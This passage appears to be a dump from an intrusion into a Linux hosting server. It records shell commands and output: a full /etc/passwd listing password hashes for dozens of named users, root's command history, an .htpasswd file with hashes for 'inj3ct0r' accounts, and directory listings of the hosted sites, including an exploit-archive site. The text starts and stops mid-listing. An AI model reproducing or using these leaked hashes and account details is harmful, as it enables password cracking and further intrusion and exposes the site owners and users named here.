2007 lost+found drwxr-xr-x 2 root root 1024 Nov 3 2007 media drwxr-xr-x 2 root root 1024 Oct 28 2006 mnt drwxr-xr-x 2 root root 1024 Nov 3 2007 opt dr-xr-xr-x 154 root root 0 Oct 15 15:18 proc drwxr-x--- 7 root root 1024 Oct 15 17:27 root drwxr-xr-x 2 root root 6144 Oct 3 21:09 sbin drwxr-xr-x 2 root root 1024 Sep 16 2008 selinux drwxr-xr-x 2 root root 1024 Nov 3 2007 srv drwxr-xr-x 11 root root 0 Oct 15 15:18 sys drwxrwxrwt 7 root root 492544 Oct 24 19:03 tmp drwxr-xr-x 12 root root 4096 Jul 29 11:22 usr drwxr-xr-x 15 root root 4096 Oct 29 2009 var lrwxrwxrwx 1 root root 25 Jul 29 11:28 vmlinuz -> boot/vmlinuz-2.6.26-2-686 lrwxrwxrwx 1 root root 25 Nov 24 2008 vmlinuz.old -> boot/vmlinuz-2.6.18-6-686 $ cat /etc/passwd root:1NMGwkEq76.BsjeYGuM106fIjuU.RS/:0:0:root:/root:/bin/bash daemon:*:1:1:daemon:/usr/sbin:/bin/sh bin:*:2:2:bin:/bin:/bin/sh sys:*:3:3:sys:/dev:/bin/sh sync:*:4:65534:sync:/bin:/bin/sync games:*:5:60:games:/usr/games:/bin/sh man:*:6:12:man:/var/cache/man:/bin/sh lp:*:7:7:lp:/var/spool/lpd:/bin/sh mail:*:8:8:mail:/var/mail:/bin/sh news:*:9:9:news:/var/spool/news:/bin/sh uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh proxy:*:13:13:proxy:/bin:/bin/sh www-data:*:33:33:www-data:/var/www:/bin/sh backup:*:34:34:backup:/var/backups:/bin/sh list:*:38:38:Mailing List Manager:/var/list:/bin/sh irc:*:39:39:ircd:/var/run/ircd:/bin/sh gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:*:65534:65534:nobody:/nonexistent:/bin/sh mysql:!:100:102:MySQL Server,,,:/var/lib/mysql:/bin/false proftpd:!:101:65534::/var/run/proftpd:/bin/false ftp:!:102:65534::/home/ftp:/bin/false sshd:!:103:65534::/var/run/sshd:/usr/sbin/nologin Debian-exim:!:104:104::/var/spool/exim4:/bin/false krivopustov:1V5RSW94dbZ3zwhsovKB4V5hHgvLLF/:1002:1002:,,,:/home/krivopustov:/bin/bash volosovets:1NMLjMXqhFedJgnjw0uBwdQ2jRFqbG0:1007:1007:,,,:/home/volosovets:/bin/bash wapper:1c1iEEB/k591mvgQk8a5mbsZmPwY8Q1:1008:1008:,,,:/home/wapper:/bin/bash jaguar:1NOCfawFB/TD6X9.hEmN9Mn0kg1G.s1:1011:1011:,,,:/home/jaguar:/bin/bash postfix:!:105:106::/var/spool/postfix:/bin/false popa3d:!:106:109::/var/lib/popa3d:/bin/false asmer:1O2E8f0enwpuZw37FkNoe0MNSktFTd.:1012:1012:,,,:/home/asmer:/bin/bash wateam:1cewmdLFokkbiLeLlHrL2NJnPdqpnR/:1013:1013:,,,:/home/wateam:/bin/bash silentwarrior:1aDOI9IqA5BrDw1EBfH4Afm5TYRNe//:1014:1014:,,,:/home/silentwarrior:/bin/bash snt-nmu:1NZO0tdC.reQ07bby/FttmOEZLF7ys1:1015:1015:,,,:/home/snt-nmu:/bin/bash nmusic:1tXoV.I8o28zdaeu.Ukrde4hYikNtG0:1020:1020:,,,:/home/nmusic:/bin/bash mydns:1C8cYgZB0p9rtxWwyXoiJiK4QUa.sJ/:1021:1021:,,,:/home/mydns:/bin/bash conference-sidelnikov:1ghcMsPcI9j5ok3AbEf5qGI.h7Mq7O.:1016:1016:,,,:/home/conference-sidelnikov:/bin/bash lena:153QNshcJB/5PK1r8L/60LAOJCwzik1:1000:1000:,,,:/home/lena:/bin/bash vakulenko:1g6y9T9/TWWr1s.FTZKwuKj2qwbYxg1:1027:1027:,,,:/home/vakulenko:/bin/bash xanavi:1V4L5wKgWog9Kl4lV0uwvG0/0TyHyq1:1001:1001:,,,:/home/xanavi:/bin/bash lalizas:1dzDm0j2v0fE06VyK89b/Pfm6ePylC0:1003:1003:,,,:/home/lalizas:/bin/bash r0otech0inj3ct0rr00t0ro0t3r:1Yu.4UMOxpFH639CL8260qyjYwKgbk1:1006:1034:,,,:/home/r0otech0inj3ct0rr00t0ro0t3r:/bin/bash n3tw0rkTeRr0r15M:1u1DDFCJnGFd0M07E5kahW3t0N1yYD1:1010:1034:,,,:/home/n3tw0rkTeRr0r15M:/bin/bash pma:1cDULb4Zqt4ksmqqFe9MIQSBLrz3lO.:1019:1019:,,,:/home/pma:/bin/bash valiant:1QXeOzsOyaW8gT6JknX1Ssa.A3ef8g/:1024:1024:,,,:/home/valiant:/bin/bash cherrybikes:11MJaagK8rJ6BQ9pxLdZjU.WhIGG4r0:1031:1031:,,,:/home/cherrybikes:/bin/bash natasha:1NmwIlomO.Y00wBbg0eGE9dqOP4qis/:1032:1032:,,,:/home/natasha:/bin/bash ntp:!:107:107::/home/ntp:/bin/false chupik:1gpJL5HGbm7EeCor46OOs8L0y1L7mH1:1005:1033:,,,:/home/chupik:/bin/bash sweethome:1x4j1/bzV8Vf5fHBfeSp3BgMUNojJf.:1004:1035:,,,:/home/sweethome:/bin/bash sweethome-lena:1uZFdDmVbAHGDtbBEGs1jjYYtvVONN1:1009:1036:,,,:/home/sweethome-lena:/bin/bash skyweb:1.wiXZLSKG4F6WGVdgKDIorjx77.ZD1:1028:1037:,,,:/home/skyweb:/bin/bash yslivka:1RNlOuljj5wZ8hdD0kSDe2wPMREdBu1:1029:1038:,,,:/home/yslivka:/bin/bash tmv-nmu:168k122DrZFKqjXrwYSjjdMSKzzVDy.:1030:1039:,,,:/home/tmv-nmu:/bin/bash web-ghost:1wuuXL1mSrDxVErzeO0KuoZKu8mJBj1:1018:1018:,,,:/home/web-ghost:/bin/bash tiler-andrey:1RGxMA/cQA090Sx/VTTctkkHFZEs7I1:1035:1041:,,,:/home/tiler-andrey:/bin/bash sunsanych:1RaR9SD58m80b/DVZEHYg6Ik4SKYWJ.:1036:1042:,,,:/home/sunsanych:/bin/bash ra5ta:1nkELVbaHtGqTJl29kSFbjlDs1Yy3U0:1037:1043:,,,:/home/ra5ta:/bin/bash magicgarden:1.MBu1KaRXkR2bihB8ZXnqfHbqQ5bm0:1038:1044:,,,:/home/magicgarden:/bin/bash hochumogu:1MwCkIsEmO0Xe/BV8PndFgE9sIMF/Q1:1025:1025:,,,:/home/hochumogu:/bin/bash libuuid:!:108:110::/var/lib/libuuid:/bin/sh steelnews:1ajGgNpodz1jrN1JlmcmLmms5Wf7kn0:1017:1017:,,,:/home/steelnews:/bin/bash vonline:1sk1MRD8BW3jlEKEYUNCtJ3d0gY1bh0:1022:1045:,,,:/home/vonline:/bin/bash dyquem:1JkATmEyg3XnBHIeGOEstzP2vmes4s1:1039:1046:,,,:/home/dyquem:/bin/bash vika:1bkhqsMEjgj7H.DzRJLoGj64SksjzM1:1040:1047:,,,:/home/vika:/bin/bash tiler-dima:1jKtO0mArwxlajKK9/v4yFHF1mu9/g0:1026:1040:,,,:/home/tiler-dima:/bin/bash mazafaka:1LSjx2PhiI7OlLVcMSEz2GJDUiwBmg.:1034:1034:,,,:/home/mazafaka:/bin/bash tiler:1Qa4oVdJmYjcu6Ccq/7AqTEA6V2GIT1:1023:1023:,,,:/home/tiler:/bin/bash $ cd /root $ ls -la total 14 drwxr-x--- 7 root root 1024 Oct 15 17:27 . drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. drwx------ 2 root root 1024 Aug 20 02:09 .aptitude -rw------- 1 root root 6748 Oct 22 22:28 .bash_history drwxr-xr-x 2 root root 1024 Aug 20 02:09 .debtags drwxr-xr-x 2 root root 1024 Oct 15 17:29 .mc drwxr-xr-x 2 root root 1024 Aug 2 21:39 scripts drwxr-xr-x 2 root root 1024 Oct 15 16:51 test $ cat .bash_history apache2 -k restart cd /home/maza*/h* ls -al nano index.html ls -al nano index.html exit a2ensite mazafaka.in apache2 -k restart edquota -g inj3ct0r quotatool quotatool -g inj3ct0r -bl 512M /home edquota inj3ct0r edquota -g inj3ct0r exit cd /home/n* ls -al cd ht* ls -al nano index.php ls -al cd t*dark ls -al cd gra* ls -al cd .. du cd .. ls -al du tech_dark du tech_blue du tech_white ls -al cd cpstyles ls -al du du -h cd . cd.. cd .. du -h *dark cd tech_dark ls -al cd misc ls -al cd .. cd .. find ./ -name *.tpl find ./ -name *.htm find ./ -name *.htm* find ./ -name *.tpl cd .. cd ht* cd gree* ls -al du -h cd pools cd pools cd polls ls -al cd .. cd regimage ls -la cd ../.. nano index.php ls -al rm ya*.txt rm google* cd incl* ls -al cd .. ls -al cd green* ls -al cd editor ls -al cd .. cd attach ls -al cd .. cd .. ls -al find ./ -name *.css cd cp* ls -al cd vB* ls -al cd .. ls -al du -h cd .. find ./ -name *.css nano ./tech_white/tech_white.css exit cd /etc/ nano crontab exit cd /var/ ls -la cd mail ls -al cd /etc/postfix nano virtual postmap virtual nano aliases defrag ls -al exit cd /var/mail ls -al rm tiler-* ls -la exit exit passwd tiler passwd tiler exit cd /etc/ nano passwd exit passwd lena exit sasldbpasswd2 saslpasswd2 saslpasswd2 -c lena sasllistusers2 sasldblistusers2 saslpasswd2 saslpasswd2 -d sweethome-lena exit saslpasswd2 -c sweethome-lena passwd sweethome-lena exit passwd tiler exit cd /home/snt* ls -al cd ht* ls -al nano index.php exit cd /home/sn*/h*/ nano index.php cd /home/wa*/h* ls -al nano index.php cd /home/wateam cd h* nano index.html exit cd /home ls -al cd lena ls -al cd htdocs ls -al cd .. cd .. rm lena -R cd mydns ls -al cd .. rmdir mydns cd temp ls -al du -h rm * cd .. ls -al cd lo* ls -al cd .. rmdir lost+found exit cd /home/wateam ls -al cd other ls -al cd ../htdocs nano index.html exit cd /home/n* cd htdocs ls -al cd inc* ls -al nano config.php exit cd /etc/apache2 nano apache2.conf nano vhosts.conf nano apache2.conf apache2 -k restart nano apache2.conf apache2 -k restart cd /mo*e cd mo*e nano fcgi* cd .. nano vhosts nano vhosts cd /var/lib/log* ls -al cat status cat status|more nano status rm status logrotate logrotate -f /etc/logrotate.conf ls -al nano status ls -al df -h cd /var/log ls -al exit cd /home/ tar --help tar cls tar --help|more tar --help|more tar --help|more cd cd tiler ls -al cd tiler ls -al tar cvzf tiler.tar ls -al cd ht* ls -al tar cvzf tiler.tar tar --help|more man tar ls -akl ls -al cd .. tar -zcvf tiler.tar htdocs ls -la nano /etc/passwd init 6 exit ren rename mkdir test cd test touch 1d_5.jpg touch 1d_7.JPG touch 1.jpg touch 1d7.JPg ls -al rename rename --help man rename rename -n (.*)\.JPG 1.jpg rename -n '/.*\.JPG/' *.jpg rename -n /.*\.JPG/ *.jpg rename -n /.*\.JPG/ * rename -nv /.*\.JPG/ * ls -al rename -nv s/.*\.JPG/ * rename -nv /.*\.JPG/ * rename -nv /.*\.JPG/ *.JPG rename -nv /.*\.JPG/ *.JPG rename -nv '/.*\.JPG/' *.JPG rename -nv '/.+\.JPG/' *.JPG rename -nv '/.+\.JPG/' *.JPG rename -nv . * rename -nv /./ * rename -nv /./ *.JPG rename -n 'y/A-Z/a-z/' * rename -n '/A-Z/a-z/' * rename -n /\.JPG/ * rename -n /\.JPG/ *.JPG rename -n '\.JPG' *.JPG rename -n 's/\.JPG/' *.JPG rename -n 's/\.JPG//' *.JPG rename -n 's/\.JPG//' *.JPG rename -n '/\.JPG//' *.JPG rename -n '/\.JPG//' *.JPG rename -n '/\.JPG/' *.JPG rename -n 's/\.JPG//' *.JPG ls -al mv 1.jpg ONE.JPG ls -la rename -n 's/\.JPG//' *.JPG rename -n 's/\.JPG//' ** rename -n 's/\.JPG//' *.* rename -n 's/\.JPG//' rename -n 's/\.JPG//' *.JPG rename -n 's/\.JPG//' *E.JPG rename -n 's/\.JPG//' *. man rename rename -nv s\.jpg// *.JPG rename -nv s\./jpg// *.JPG rename -nv s\./jpg// *.JPG man rename rename -nv .JPG .jpg * rename -nv /.JPG .jpg/ * rename -nv /\.JPG \.jpg/ * rename -nv /\.JPG \.jpg/ *rename .bak .txt *.bak rename .bak .txt *.bak rename -nv s/\.JPG/\.jpg/ * rename -nv s/\.JPG/\.jpg/ * rename -nv s/\.JPG/\.jpg/ * rename -nv s/\.JPG/\./ * rename -nv s/\.JPG/\.jpg/ * cd /home/ cd tiler cd ht* cd up* cd ima* ls -al rename s/\.JPG/\.jpg/ * ls -al ls -al rename s/\.JPG/\.jpg/ * rename -nv s/\.JPG/\.jpg/ * rename -nv s/\.JPG/\.jpg/ *|more rename -nv s/\.JPG/\.jpg/ *|more mc cd .. cd .. cd .. ls -al tar zcvf tiler.tar.gz htdocs cd ht* rmdir uploaded -R rm uploaded -R exit cd /home/r0*' cd /home/r0* cd h* nano index.php cd ../../snt* cd ht* nano index.php cd ../../n* cd ht* ls -al nano index.php ls -al find / - name *.tpl find ./ -name *.tpl find ./ -name template find ./ -name tp find ./ -name tem find ./ -name them ls -al grep --help grep -rl "sweethome" ./ grep -rl "tiler" ./ cd ../../ ls -al cd sweethome ls -al cd htdocs ls -al nano tem* cd tem* cd blocks ls -al nano left.php nano left.php cd /home/tiler/ht* ls -al cd .././ cd ../ ls -al cd sn* cd ht* nano index.php cd ../../ cd r0*/h* nano index.php cd ../../wa* cd ../wateam cd ht* nani index.html nani index.htm nani index.php ls -al nano index.html exit /etc/init.d/ssh_brute stop /etc/init.d/ssh_brute start cd /var/log/pro* ls -al tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log tail -n 100 proftpd.log|grep 18 tail -n 100 proftpd.log|grep 18 tail -n 100 proftpd.log|grep 18 tail -n 100 proftpd.log|grep 18 exit cd /home/tiler ls -al tar zcvf 18.10.2010.tar.gz htdocs ls -al exit cd /var/log cd mail ls -al cat mail.log|grep stempher cat mail.log|grep "Oct 19 12" cat mail.log|grep "Oct 19 12"|more exit adduser sbs adduser sbs deluser sbs adduser sbs cd /home/sbs cd /etc/apache2 ls -al cd si*e ls -al cp yslivka.org.ua sbs-ua.com nano sbs-ua.com a2ensite sbs-ua.com cd /etc exit apache2 -k restart exit cd /etc/apache2 cd si*e ls -al nano asmerok.org.ua apache2 -k restart adduser www-data sbs adduser www-data sbs apache2 -k restart exit cd /etc/ssh* ls -al cd sshd* nano sshd* exit /etc/init.d/ssh restart exit cd /etc/apache2 cd si*e nano sbs-ua.com apache2 -k restart exit unrar urar apt-get install unrar apt-get clean apt-get update apt-get install unrar apt-get install urar apt-get install unrar-free unrar unrar --help unrar --usage apt-get upgrade apt-get clean exit deluser sbs cd /home rm sbs -R a2dissite sbs-ua.com cd /etc/apache2 cd si*e rm sbs-ua.com apache2 -k restart ls -al exit cd /home ls -la exit cd /etc/apache2 cd si*e cp chupik.org.ua vdnh.org.ua cp chupik.org.ua vdnh.org.ua ls -al cd .. nano vhosts cd si*e ls -al nano chupik.org.ua nano vdnh.org.ua a2ensite chupik.org.ua a2ensite vdnh.org.ua apache2 -k restart exit cd scripts ls -la total 4 drwxr-xr-x 2 root root 1024 Aug 2 21:39 . drwxr-x--- 7 root root 1024 Oct 15 17:27 .. -rwx------ 1 root root 76 Feb 1 2010 clear_cband.sh -rwx------ 1 root root 220 May 31 00:59 uaix_block.sh cat * #!/bin/sh apache2 -k stop sleep 5 rm /etc/apache2/cband/* apache2 -k start #!/bin/sh rm prefixes.txt rm /etc/apache2/cband-ua.conf wget -q http://www.colocall.net/uaix/prefixes.txt for i in `cat prefixes.txt` do echo "CBandClassDst i" >> /etc/apache2/cband-ua.conf done apache2ctl graceful $ cd .. $ cd test $ ls -la total 2 drwxr-xr-x 2 root root 1024 Oct 15 16:51 . drwxr-x--- 7 root root 1024 Oct 15 17:27 .. -rw-r--r-- 1 root root 0 Oct 15 16:34 1d7.JPg -rw-r--r-- 1 root root 0 Oct 15 16:33 1d_5.jpg -rw-r--r-- 1 root root 0 Oct 15 16:33 1d_7.JPG -rw-r--r-- 1 root root 0 Oct 15 16:33 ONE.JPG $ cd /home $ ls -la total 169 drwxr-x--x 37 root root 4096 Oct 20 17:45 . drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. -rw------- 1 root root 9216 Oct 22 17:45 aquota.group -rw------- 1 root root 9216 Oct 22 17:45 aquota.user drwxr-x--- 7 asmer asmer 4096 Oct 22 18:58 asmer drwxr-x--- 6 cherrybikes cherrybikes 4096 Oct 24 18:56 cherrybikes drwxr-x--- 4 chupik chupik 4096 Dec 14 2009 chupik drwxr-x--- 4 conference-sidelnikov conference-sidelnikov 4096 Jan 7 2010 conference-sidelnikov drwxr-x--- 4 dyquem dyquem 4096 Sep 6 17:20 dyquem drwxr-x--- 4 hochumogu hochumogu 4096 Jul 16 16:51 hochumogu drwxr-x--- 13 jaguar jaguar 4096 Oct 24 10:49 jaguar drwxr-x--- 4 krivopustov krivopustov 4096 Nov 6 2007 krivopustov drwxr-x--- 3 lalizas lalizas 4096 Feb 18 2009 lalizas drwxr-x--- 4 magicgarden magicgarden 4096 Jul 12 23:32 magicgarden drwxr-x--- 4 mazafaka inj3ct0r 4096 Oct 3 20:33 mazafaka drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 n3tw0rkTeRr0r15M drwxr-x--- 4 natasha natasha 4096 Oct 19 2009 natasha drwxr-x--- 4 nmusic nmusic 4096 Mar 2 2009 nmusic drwxr-x--- 4 pma pma 4096 May 13 16:28 pma drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 r0otech0inj3ct0rr00t0ro0t3r drwxr-x--- 4 ra5ta ra5ta 4096 Jul 12 18:25 ra5ta drwxr-x--- 4 silentwarrior silentwarrior 4096 Oct 4 2009 silentwarrior drwxr-x--- 4 skyweb skyweb 4096 Apr 16 2010 skyweb drwxr-x--- 4 snt-nmu snt-nmu 4096 Feb 27 2009 snt-nmu drwxr-x--- 4 steelnews steelnews 4096 Sep 4 15:20 steelnews drwxr-x--- 4 sunsanych sunsanych 4096 Jun 13 14:07 sunsanych drwxr-x--- 4 sweethome sweethome 4096 Aug 16 01:21 sweethome drwxrwxrwx 2 root root 4096 Oct 24 16:12 temp drwxr-x--- 4 tiler tiler 4096 Oct 20 22:37 tiler drwxr-x--- 4 tmv-nmu tmv-nmu 4096 May 6 08:49 tmv-nmu drwxr-x--- 4 vakulenko vakulenko 4096 Feb 27 2009 vakulenko drwxr-x--- 4 vika vika 4096 Sep 8 19:15 vika drwxr-x--- 4 volosovets volosovets 4096 Nov 6 2007 volosovets drwxr-x--- 4 vonline vonline 4096 Sep 5 22:13 vonline drwxr-x--- 5 wapper wapper 4096 Jun 13 2009 wapper drwxr-x--- 4 wateam wateam 4096 Dec 27 2009 wateam drwxr-x--- 4 web-ghost web-ghost 4096 Jun 7 10:05 web-ghost drwxr-x--- 4 xanavi xanavi 4096 Jun 9 2009 xanavi drwxr-x--- 4 yslivka yslivka 4096 Apr 23 2010 yslivka $ cd r0otech0inj3ct0rr00t0ro0t3r $ ls -la total 8048 drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 . drwxr-x--x 37 root root 4096 Oct 20 17:45 .. drwxr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Jan 22 2010 cgi-bin -rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 8210510 Oct 24 19:29 error.log dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 24 19:27 htdocs $ cd htdocs $ ls -la total 184 dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 5 19:21 . drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 .. -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1821 Oct 5 19:19 .htaccess -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 85 Oct 1 14:17 BingSiteAuth.xml -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4047 Oct 1 14:17 author.php dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 banner dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 13:20 banner_black -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1445 Oct 1 14:17 browser.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2308 Oct 1 14:17 category.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 604 Oct 1 14:17 config.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 date.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 562 Oct 1 14:17 db.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2090 Oct 1 14:17 exploit.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1406 Oct 1 14:17 favicon.ico dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 28 14:15 files -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 53 Oct 1 14:17 googlee6e0c515ab2abd97.html -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 83 Oct 1 14:17 hacker.php dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 02:37 images -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1745 Oct 16 12:34 index.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2672 Oct 8 13:19 inj3ct0r.css -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 9293 Oct 5 19:15 lib.php dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 pages -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1008 Oct 1 14:17 pages.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2873 Oct 1 14:17 platform.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1894 Oct 1 14:17 related.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 131 Oct 1 14:17 robots.txt -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 rss.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2203 Oct 5 19:10 search.php -rwxr--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1739 Oct 1 14:17 sitemap.php -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 48792 Oct 24 18:58 sitemap.xml.gz dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 27 23:53 sploits dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 templates -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 261 Oct 1 14:17 y_key_6e34fe98df61c405.html -rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 0 Oct 1 14:17 yandex_76b91b15d528ba00.txt $ cat config.php shellcodeCategories, 25 ); redCategory = 34; ?> $ cd .. $ cd n3tw0rkTeRr0r15M $ ls -la total 20 drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 . drwxr-x--x 37 root root 4096 Oct 20 17:45 .. -rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 96 Aug 12 12:15 .htpasswd drwxr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jan 22 2010 cgi-bin drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 htdocs $ cat .htpasswd inj3ct0r:1dAX/67F424a4D3Z.QWXTfZi0e2/0G/ inj3ct0r_operator:1cjVbCTaHGGgdG7e.ceNBXZ7ucjsOt1 $ cd htdocs $ ls -la total 2240 drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 . drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 .. -rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 178 Aug 24 01:59 .htaccess -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24170 Jun 29 15:27 ajax.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75837 Jun 29 15:27 album.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17463 Jun 29 15:27 announcement.php dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 archive -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18637 Jun 29 15:28 attachment.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75654 Jun 29 15:28 calendar.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 43 Jun 6 14:02 clear.gif dr-xr-xr-x 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:45 clientscript -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 15264 Jun 29 15:28 converse.php dr-xr-xr-x 7 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 cpstyles -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 3645 Jun 29 15:28 cron.php dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 customavatars dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customgroupicons dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customprofilepics -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 48083 Jun 29 15:28 editpost.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29811 Jun 29 15:29 external.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10114 Jun 29 15:29 faq.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36347 Jun 29 15:41 forumdisplay.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40159 Jun 29 15:29 global.php dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 greenfox -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 138517 Jun 29 15:30 group.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25247 Jun 29 15:29 group_inlinemod.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10850 Jun 29 15:30 groupsubscription.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9375 Jun 29 15:30 image.php dr-xr-xr-x 5 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:42 images dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 12288 Jun 6 14:01 includes -rwxrwxrwx 1 n3tw0rkTeRr0r15M inj3ct0r 19444 Sep 26 12:27 index.php dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 16:28 infernoshout -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11103 Jun 29 15:30 infernoshout.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 44256 Jun 29 15:30 infraction.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10670 Jun 29 15:31 joinrequests.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11052 Jun 29 15:31 login.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17392 Jun 29 15:31 member.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 16259 Jun 29 15:31 member_inlinemod.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36229 Jun 29 15:31 memberlist.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24194 Jun 29 15:31 misc.php dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 modcp -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 63652 Jun 29 15:32 moderation.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 7084 Jun 29 15:32 moderator.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 1889 Jun 29 15:32 myip.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18804 Jun 29 15:32 newattachment.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 37429 Jun 29 15:33 newreply.php -r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19239 